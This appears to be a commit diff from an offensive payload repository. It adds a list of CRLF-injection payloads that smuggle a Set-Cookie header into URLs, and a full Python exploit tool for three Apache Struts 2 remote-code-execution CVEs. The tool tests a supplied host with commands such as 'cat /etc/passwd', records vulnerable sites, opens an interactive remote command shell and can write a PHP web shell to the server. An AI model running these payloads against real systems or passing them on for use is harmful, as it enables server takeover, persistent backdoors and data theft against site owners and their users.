Deployed a338b2f with MkDocs version: 1.6.1

CRLF Injection/Files/crlfinjection.txt

@@ -0,0 +1,17 @@
+/%%0a0aSet-Cookie:crlf=injection
+/%0aSet-Cookie:crlf=injection
+/%0d%0aSet-Cookie:crlf=injection
+/%0dSet-Cookie:crlf=injection
+/%23%0aSet-Cookie:crlf=injection
+/%23%0d%0aSet-Cookie:crlf=injection
+/%23%0dSet-Cookie:crlf=injection
+/%25%30%61Set-Cookie:crlf=injection
+/%25%30aSet-Cookie:crlf=injection
+/%250aSet-Cookie:crlf=injection
+/%25250aSet-Cookie:crlf=injection
+/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
+/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
+/%2F..%0d%0aSet-Cookie:crlf=injection
+/%3f%0d%0aSet-Cookie:crlf=injection
+/%3f%0dSet-Cookie:crlf=injection
+/%u000aSet-Cookie:crlf=injection

CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py

@@ -0,0 +1,215 @@
+#!/usr/bin/python
+
+from __future__ import print_function
+from future import standard_library
+standard_library.install_aliases()
+from builtins import input
+from builtins import str
+import urllib.request, urllib.error, urllib.parse
+import time
+import sys
+import os
+import subprocess
+import requests
+import readline
+import urllib.parse
+
+RED = '\033[1;31m'
+BLUE = '\033[94m'
+BOLD = '\033[1m'
+GREEN = '\033[32m'
+OTRO = '\033[36m'
+YELLOW = '\033[33m'
+ENDC = '\033[0m'
+
+def cls():
+    os.system(['clear', 'cls'][os.name == 'nt'])
+cls()
+
+logo = BLUE+'''
+  ___   _____  ___    _   _  _____  ___
+ (  _`\(_   _)|  _`\ ( ) ( )(_   _)(  _`\
+ | (_(_) | |  | (_) )| | | |  | |  | (_(_)
+ `\__ \  | |  | ,  / | | | |  | |  `\__ \
+ ( )_) | | |  | |\ \ | (_) |  | |  ( )_) |
+ `\____) (_)  (_) (_)(_____)  (_)  `\____)
+
+        =[ Command Execution v3]=
+              By @s1kr10s
+'''+ENDC
+print(logo)
+
+print(" * Ejemplo: http(s)://www.victima.com/files.login\n")
+host = input(BOLD+" [+] HOST: "+ENDC)
+
+if len(host) > 0:
+    if host.find("https://") != -1 or host.find("http://") != -1:
+
+        poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
+
+        def exploit(comando):
+            exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
+            return exploit
+
+        def exploit2(comando):
+            exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
+            return exploit2
+
+        def exploit3(comando):
+            exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
+            return exploit3
+
+        def pwnd(shellfile):
+            exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
+            return exploitfile
+
+        def validador():
+            arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
+            return arr_lin_win
+
+        #def reversepl(ip,port):
+        #       print "perl"
+
+        #def reversepy(ip,port):
+        #       print "python"
+
+        # CVE-2013-2251 ---------------------------------------------------------------------------------
+        try:
+            response = ''
+            response = urllib.request.urlopen(host+poc)
+        except:
+            print(RED+" Servidor no responde\n"+ENDC)
+            exit(0)
+
+        print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC)
+
+        if response.read().find("mamalo") != -1:
+            print(RED+"   [-] VULNERABLE"+ENDC)
+            owned = open('vulnsite.txt', 'a')
+            owned.write(str(host)+'\n')
+            owned.close()
+
+            opcion = input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
+            #print BOLD+"   * [SHELL REVERSA]"+ENDC
+            #print OTRO+"     Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
+            if opcion == 's':
+                print(YELLOW+"   [-] GET PROMPT...\n"+ENDC)
+                time.sleep(1)
+                print(BOLD+"   * [UPLOAD SHELL]"+ENDC)
+                print(OTRO+"     Struts@Shell:$ pwnd (php)\n"+ENDC)
+
+                while 1:
+                    separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC)
+                    espacio = separador.split(' ')
+                    comando = "','".join(espacio)
+
+                    if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
+                        shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'"))
+                        print("\n"+shell.read())
+                    elif espacio[0] == 'pwnd':
+                        pathsave=input("path EJ:/tmp/: ")
+
+                        if espacio[1] == 'php':
+                            shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
+                            urllib.request.urlopen(host+pwnd(str(shellfile)))
+                            shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
+                            if shell.read().find(pathsave+"status.php") != -1:
+                                print(BOLD+GREEN+"\nCreate File Successful :) ["+pathsave+"status.php]\n"+ENDC)
+                            else:
+                                print(BOLD+RED+"\nNo Create File :/\n"+ENDC)
+
+        # CVE-2017-5638 ---------------------------------------------------------------------------------
+        print(BLUE+"     [-] NO VULNERABLE"+ENDC)
+        print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC)
+        x = 0
+        while x < len(validador()):
+            valida = validador()[x]
+
+            try:
+                req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
+                result = urllib.request.urlopen(req).read()
+
+                if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
+                    print(RED+"   [-] VULNERABLE"+ENDC)
+                    owned = open('vulnsite.txt', 'a')
+                    owned.write(str(host)+'\n')
+                    owned.close()
+
+                    opcion = input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
+                    if opcion == 's':
+                        print(YELLOW+"   [-] GET PROMPT...\n"+ENDC)
+                        time.sleep(1)
+
+                        while 1:
+                            try:
+                                separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
+                                req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
+                                result = urllib.request.urlopen(req).read()
+                                print("\n"+result)
+                            except:
+                                exit(0)
+                    else:
+                        x = len(validador())
+                else:
+                    print(BLUE+"     [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
+            except:
+                pass
+            x=x+1
+
+        # CVE-2018-11776 ---------------------------------------------------------------------------------
+        print(BLUE+"     [-] NO VULNERABLE"+ENDC)
+        print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC)
+        x = 0
+        while x < len(validador()):
+            #Filtramos la url solo dominio
+            url = host.replace('#', '%23')
+            url = host.replace(' ', '%20')
+            if ('://' not in url):
+                url = str("http://") + str(url)
+            scheme = urllib.parse.urlparse(url).scheme
+            site = scheme + '://' + urllib.parse.urlparse(url).netloc
+
+            #Filtramos la url solo path
+            file_path = urllib.parse.urlparse(url).path
+            if (file_path == ''):
+                file_path = '/'
+
+            valida = validador()[x]
+            try:
+                result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
+
+                if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
+                    print(RED+"   [-] VULNERABLE"+ENDC)
+                    owned = open('vulnsite.txt', 'a')
+                    owned.write(str(host)+'\n')
+                    owned.close()
+
+                    opcion = input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
+                    if opcion == 's':
+                        print(YELLOW+"   [-] GET PROMPT...\n"+ENDC)
+                        time.sleep(1)
+                        print(BOLD+"   * [UPLOAD SHELL]"+ENDC)
+                        print(OTRO+"     Struts@Shell:$ pwnd (php)\n"+ENDC)
+
+                        while 1:
+                            separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC)
+                            espacio = separador.split(' ')
+                            comando = "%20".join(espacio)
+
+                            shell = urllib.request.urlopen(host+exploit3(str(comando)))
+                            print("\n"+shell.read())
+
+                    else:
+                        x = len(validador())
+                        exit(0)
+                else:
+                    print(BLUE+"     [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
+            except:
+                pass
+            x=x+1
+    else:
+        print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC)
+        exit(0)
+else:
+    print(RED+" Debe Ingresar una Url\n"+ENDC)
+    exit(0)